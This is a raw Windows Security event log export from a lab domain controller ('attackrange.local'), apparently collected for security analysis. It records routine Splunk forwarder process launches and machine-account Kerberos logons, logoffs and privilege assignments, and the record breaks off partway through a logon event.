EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264009
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264008
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfbc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264015
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79C814
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264014
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x79C814
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51751
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264013
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79C814
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264012
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79C7A8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264011
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x79C7A8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51750
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:42:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264010
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79C7A8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:42:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264018
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79D542
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:42:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264017
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x79D542
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51760
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:42:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264016
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x79D542
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:43:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264019
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1820
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264021
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bdc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264020
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264022
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264023
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd9c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264025
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x103c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264024
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:43:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264028
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A10A1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:43:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264027
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A10A1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51773
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:43:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264026
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A10A1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264039
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A1504
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264038
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A15F2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264037
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A163A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264036
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A16AE
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51778
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264035
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A16AE
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264034
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
